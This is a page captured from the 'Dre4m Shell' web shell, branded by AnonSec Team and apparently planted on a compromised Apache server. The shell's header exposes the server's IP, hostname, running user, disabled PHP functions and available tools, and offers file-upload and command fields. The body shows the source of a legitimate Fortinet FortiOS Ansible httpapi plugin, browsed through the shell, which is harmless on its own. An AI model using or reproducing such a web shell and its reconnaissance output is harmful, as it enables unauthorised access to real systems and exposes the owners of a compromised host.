Dre4m Shell
Server IP : 85.214.239.14  /  Your IP : 18.188.87.95
Web Server : Apache/2.4.62 (Debian)
System : Linux h2886529.stratoserver.net 4.9.0 #1 SMP Mon Sep 30 15:36:27 MSK 2024 x86_64
User : www-data ( 33)
PHP Version : 7.4.18
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare,
MySQL : OFF  |  cURL : OFF  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : OFF
Directory :  /lib/python3/dist-packages/ansible_collections/fortinet/fortios/plugins/httpapi/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : /lib/python3/dist-packages/ansible_collections/fortinet/fortios/plugins/httpapi//fortios.py
# Copyright (c) 2022 Fortinet
# GNU General Public License v3.0+ (see LICENSE or https://www.gnu.org/licenses/gpl-3.0.txt)

# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.

from __future__ import (absolute_import, division, print_function)
__metaclass__ = type

DOCUMENTATION = """
---
name: fortios
short_description: HttpApi Plugin for Fortinet FortiOS Appliance or VM
description:
  - This HttpApi plugin provides methods to connect to Fortinet FortiOS Appliance or VM via REST API
author:
  - Miguel Angel Munoz (@magonzalez)
version_added: "2.0.0"
"""

import json
from ansible.plugins.httpapi import HttpApiBase
from ansible.module_utils.basic import to_text
from ansible.module_utils.six.moves import urllib
import re
# import requests
from datetime import datetime


class HttpApi(HttpApiBase):
    def __init__(self, connection):
        super(HttpApi, self).__init__(connection)

        self._conn = connection
        self._system_version = None
        self._ansible_fos_version = 'v6.0.0'
        self._ansible_galaxy_version = '2.3.0'
        self._log = None
        self._logged_in = False
        self._session_key = ''

    def log(self, msg):
        log_enabled = self._conn.get_option('enable_log')
        if not log_enabled:
            return
        if not self._log:
            self._log = open("/tmp/fortios.ansible.log", "a")
        log_message = str(datetime.now())
        log_message += ": " + str(msg) + '\n'
        self._log.write(log_message)
        self._log.flush()

    def get_access_token(self):
        '''get pre issued access token for API access or session_key from API based authentication.'''
        token = self._conn.get_option('access_token') if 'access_token' in self._conn._options else None

        if not token and self._session_key:
            token = self._session_key

        return token

    def set_become(self, become_context):
        """
        Elevation is not required on Fortinet devices - Skipped
        :param become_context: Unused input.
        :return: None
        """
        return None

    def login(self, username, password):
        """Call a defined login endpoint to receive an authentication token.
        try API based authentication first and fall back to web based auth."""
        if (username is None or password is None) and self.get_access_token() is None:
            raise Exception('Please provide access token or username/password to login')

        if self.get_access_token() is not None:
            self.log('login with access token')
            self._logged_in = True
            self.send_request(url='/logincheck')
            status, dummy = self.send_request(url='/api/v2/monitor/system/status?vdom=root')

            if status == 401:
                raise Exception('Invalid access token. Please check')

            self.log('login with access token succeeded')
            return

        self.log('login with username and password, try API based auth first')
        auth_payload = {
            "username": username,
            "secretkey": str(password),
            "ack_post_disclaimer": True,
            "ack_pre_disclaimer": True,
            "request_key": True
        }
        status_code, result_data = self.send_request(
            url='/api/v2/authentication',
            should_pre_login=False,
            data=json.dumps(auth_payload),
            method='POST',
        )
        if status_code == 401:
            self.log('API based auth login attempt failed, fall back to /logincheck')
            data = "username=" + urllib.parse.quote(username) + "&secretkey=" + urllib.parse.quote(password) + "&ajax=1"
            dummy, result_data = self.send_request(url='/logincheck', should_pre_login=False, data=data, method='POST')
            self.log('/logincheck with user: %s %s' % (username, 'succeeds' if result_data[0] == '1' else 'fails'))
            if result_data[0] != '1':
                raise Exception('Wrong credentials. Please check')
        else:
            self.log('API based auth with user: %s %s' % (username, 'succeeds' if "LOGIN_SUCCESS" in result_data else 'fails'))
            if "LOGIN_SUCCESS" not in result_data:
                raise Exception('Wrong credentials. Please check')
            self._logged_in = True
            try:
                json_result_data = json.loads(result_data)
                self._session_key = json_result_data['session_key']
            except Exception:
                # some older fortios version may pass session key through cookies
                pass

        self.update_system_version()

    def logout(self):
        """ Call to implement session logout."""
        self.log('logout')
        if self._session_key:
            self.send_request(url='/api/v2/authentication', method='DELETE')
        else:
            self.send_request(url='/logout', method="POST")

    def update_auth(self, response, response_text):
        """
        Get cookies and obtain value for csrftoken/session_key that will be used on next requests
        :param response: Response given by the server.
        :param response_text Unused_input.
        :return: Dictionary containing headers
        """
        headers = {
            "Accept": "application/json",
        }

        access_token = self.get_access_token()
        if access_token is not None:
            self.log('using access token - no auth update needed: %s' % access_token)
            return headers

        cookie_dict = {}
        for attr, val in response.getheaders():
            if attr.lower() == 'set-cookie' and 'APSCOOKIE_' in val:
                headers['Cookie'] = val
            elif attr.lower() == 'set-cookie' and 'session_key' in val:
                session_key = re.search(r'_(\d+=\".*\")', val)
                if session_key:
                    cookie_dict["session_key"] = session_key.group(1)
            elif attr.lower() == 'set-cookie' and 'ccsrftoken' in val:
                csrftoken_search = re.search('\"(.*)\"', val)
                if csrftoken_search:
                    headers['x-csrftoken'] = csrftoken_search.group(1)

        if len(cookie_dict) > 0:
            cookie = ""
            for key, value in cookie_dict.items():
                cookie += key + "_" + value + "; "
            if "Cookie" in headers:
                cookie += '; ' + headers["Cookie"]
            headers['Cookie'] = cookie

        self.log('updated auth headers: %s' % (headers.items()))
        return headers

    def handle_httperror(self, exc):
        """
        propogate exceptions to users
        :param exc: Exception
        """
        self.log('Exception thrown from handling http: ' + to_text(exc))

        return exc

    def _concat_token(self, url):
        if self.get_access_token():
            token_pair = 'access_token=' + self.get_access_token()
            return url + '&' + token_pair if '?' in url else url + '?' + token_pair
        return url

    def _concat_params(self, url, params):
        if not params or not len(params):
            return url
        url = url + '?' if '?' not in url else url
        for param_key in params:
            param_value = params[param_key]
            if url[-1] == '?':
                url += '%s=%s' % (param_key, param_value)
            else:
                url += '&%s=%s' % (param_key, param_value)
        return url

    def send_request(self, **message_kwargs):
        """
        Responsible for actual sending of data to the connection httpapi base plugin.
        :param should_pre_login: should perform login in place instead of having connection obj to trigger.
            this is required because for httpapi update_auth can only update headers but /api/v2/authentication
            returns sessio_key in resp body.
        :param message_kwargs: A formatted dictionary containing request info: url, data, method

        :return: Status code and response data.
        """
        if not self._logged_in and message_kwargs.get('should_pre_login', True):
            self.log('perform pre request login')
            self.login(
                self.connection.get_option("remote_user"),
                self.connection.get_option("password"),
            )

        url = message_kwargs.get('url', '/')
        if self.get_access_token() is not None:
            url = self._concat_token(message_kwargs.get('url', '/'))
        data = message_kwargs.get('data', '')
        method = message_kwargs.get('method', 'GET')
        params = message_kwargs.get('params', {})

        url = self._concat_params(url, params)
        self.log('Sending request: METHOD:%s URL:%s DATA:%s' % (method, url, data))

        try:
            response, response_data = self.connection.send(url, data, method=method)

            json_formatted = to_text(response_data.getvalue())

            self.log("response data: %s...<truncated>" % (json_formatted[:200]))
            return response.status, json_formatted
        except Exception as err:
            raise Exception(err)

    def update_system_version(self):
        """
        retrieve the system status of fortigate device
        """
        self.log('checking system_version')
        check_system_status = self._conn.get_option('check_system_status') if 'check_system_status' in self._conn._options else True
        if not check_system_status or self._system_version:
            return
        url = '/api/v2/monitor/system/status?vdom=root'
        status, result = self.send_request(url=url)
        result_json = json.loads(result)
        self._system_version = result_json.get('version', 'undefined')
        self.log('system version: %s' % (self._system_version))
        self.log('ansible version: %s' % (self._ansible_fos_version))

    def get_system_version(self):
        self.update_system_version()
        return self._system_version

Anon7 - 2022
AnonSec Team